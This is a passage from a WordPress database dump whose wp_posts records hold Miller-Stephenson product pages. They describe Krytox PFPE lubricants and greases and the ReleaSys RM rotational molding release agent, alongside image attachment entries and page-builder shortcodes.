href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include low-speed conveyor bearings that are subject to vibration, moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on the long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, non-flammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 Series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not wash away or be left behind with the grease thickener. These newly patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products are used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High-Temperature Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">Special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. Grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">Designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high-temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>Krytox Lubricants for Specialty Applications</strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low-speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing a mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-06-01 17:13:12', '2017-06-01 17:13:12', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4404, 2, '2017-06-01 17:17:51', '2017-06-01 17:17:51', '<h2 style="text-align: center;">Krytox History &amp; Product Overview</h2>\r\n<h3><strong>For the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a></strong></h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gearbox lubricant, and even gyroscope oil.\r\n\r\nIn 1964, new perfluoropolyether (PFPE)-based grease formulations, developed jointly with the U.S. Navy and Air Force. The result being MIL-G-27617, developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, a very wide range of industries and applications adopted PFPE-based oils and greases. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil &amp; 20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include low-speed conveyor bearings that are subject to vibration, moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on the long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, non-flammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 Series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not wash away or be left behind with the grease thickener. These newly patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products are used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High-Temperature Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">Special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. Grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">Designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high-temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>Krytox Lubricants for Specialty Applications</strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low-speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing a mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nUnderstand how Miller-Stephensons history with Krytox is ideal for your lubrication solutions:\r\n\r\nhttps://www.youtube.com/watch?v=tbzqYPsuauI\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-06-01 17:17:51', '2017-06-01 17:17:51', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4405, 3, '2017-06-01 17:18:59', '2017-06-01 17:18:59', '', 'shutterstock_542631694', '', 'inherit', 'closed', 'closed', '', 'shutterstock_542631694', '', '', '2017-06-01 17:18:59', '2017-06-01 17:18:59', '', 4402, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_542631694.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4406, 3, '2017-06-01 17:21:06', '2017-06-01 17:21:06', 'Rotational Molding require a excellent release agent like ReleaSys RM', 'ReleaSys RM Rotational Molding Release Agent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_551871304', '', '', '2017-06-01 17:57:54', '2017-06-01 17:57:54', '', 4402, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_551871304.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4407, 3, '2017-06-24 15:41:07', '2017-06-24 15:41:07', '<h2>ReleaSys™ RM | Rotational Molding Release Agent</h2>\n<h3>Innovative Chemistry; Exceptional Longevity, Ease of Release, and Surface Quality</h3>\nMiller-Stephenson\'s ReleaSys™ RM Rotational molding release agent combines over 50 years of release agent expertise and thermoplastic molding experience. Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles, tighter tolerances, and complex molds. ReleaSys RM is heat stable to 600°F, cures rapidly (even at room temperature), and transfers no mold release to the part.  These exceptional performance characteristics are due to this rotational molding release agent\'s usage of a proprietary formulation which tenaciously binds to the mold surface, providing a high-slip, robust barrier that is extremely abrasion resistance. The low surface energy of our coating, enhances flow of the melting resin, minimizing surface defects and decreasing cycle times. Benefits of utilizing ReleaSys RM Rotational Molding release agent are the following:\n<ul>\n 	<li>Multiple releases from a single application</li>\n 	<li>No Transfer</li>\n 	<li>Lower Scrap</li>\n 	<li>Reduced Pigment Build-up; Better Cosmetics</li>\n 	<li>Increased Productivity through reduced downtime</li>\n 	<li>No VOC, no Odor; Waterbased formulation</li>\n</ul>\nProducing a high quality, dimensionally-controlled rotomolded part would be easy if all parts were the same shape and size, but they are not. For example, a fuel cell for a marine application usually needs to be molded in a shape that will allow it to fit into a very irregular and tight space envelope. A Silo-style storage tank, on the other hand, is a large and regular in shape. The demands placed on the release agent for these two applications are very different. The marine gas tank will usually require a release agent that provides excellent resin flow during the molding process and maximum assistance when releasing from the mold.  The large water storage-tank requires similar flow assistance but a modified slip-level to prevent pre-release or other defects. Thanks to Miller-Stephenson\'s extensive expertise in the rotomolding industry we understand the problems rotomolders experience and have developed specialized rotational molding release agents to meet these specific requirements.\n<h3>Miller-Stephenson can customize a ROTOMOLDING release agent for your specific needs</h3>\nMiller-Stephenson prides itself on having a robust and dynamic R&amp;D facility which can efficiently and quickly develop a customize formula for your specific rotational molding operation. We typically find this is necessary if a mold has particularly challenging undercuts, scuppers, bolts, pins or drafts. Our team will find an immediate solution to your unique challenges and delivery a rotational molding release agent to meet not only your performance requirements, but your cost requirements as well.\n<h3>Application Specifics</h3>\nReleaSys RM rotational molding release products should be applied via any method which delivery fine atomization or via a microfiber cloth.  Ideally the mold surface would be between 20°C (68°F) and 205°C (400°F). Spray application is recommended, although brushing or wiping may also be used. Optimum multiple release performance is obtained by applying to molds preheated above 60°C (140°F). The ease of release, number of releases/application and surface finish will depend on application technique, mold temperature and number of coats applied.\n<ul>\n 	<li>LLDPE, LDPE, MDPE, HDPE, XLPE,</li>\n 	<li>Polypropylene (PP)</li>\n 	<li>Nylon / Polyamide</li>\n 	<li>Polycarbonate.</li>\n</ul>\n<h3>ReleaSys RM | Rotational Molding Release Agent</h3>\nFor any assistance with proper application, storage, or general technical assistance please see the links below or call our technical service line.  Miller-Stephenson has a team of molding release experts ready to help you.  Our pedigree in the molding industry and relationship with molding operations both large and small provides our technical team with a dynamic perspective and we hold the skills and experience needed to make sure you molding operation is cost-effective, efficient, and most importantly safe.\n\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a>\n\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>\n\n&nbsp;\n\n&nbsp;', 'ReleaSys™ RM | Rotational Molding Release Agent', 'Miller-Stephenson&#039;s ReleaSys™ RM Rotational molding release agent combines over 50 years of release agent expertise and thermoplastic molding experience. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolerance, complex molds. ReleaSys RM is heat stable to 550°F, cures rapidly (even at room temperature), and transfers no mold release to the part. With ReleaSys RM, customers achieve multiple releases, no transfer, reduced pigment build-up, lower scrap rates, better cosmetics, increased productivity, and the safety of a water-based system. Benefits include:\n<ul>\n 	<li>Multiple Releases per Application</li>\n 	<li>Rapid Cure; No Transfer</li>\n 	<li>Superior Adhesion and Durability</li>\n 	<li>Heat Stable up to 550°F</li>\n 	<li>Increased Resin Flow</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4402-autosave-v1', '', '', '2017-06-24 15:41:07', '2017-06-24 15:41:07', '', 4402, 'https://www.miller-stephenson.com/4402-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4408, 1, '2017-06-01 17:50:33', '2017-06-01 17:50:33', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" 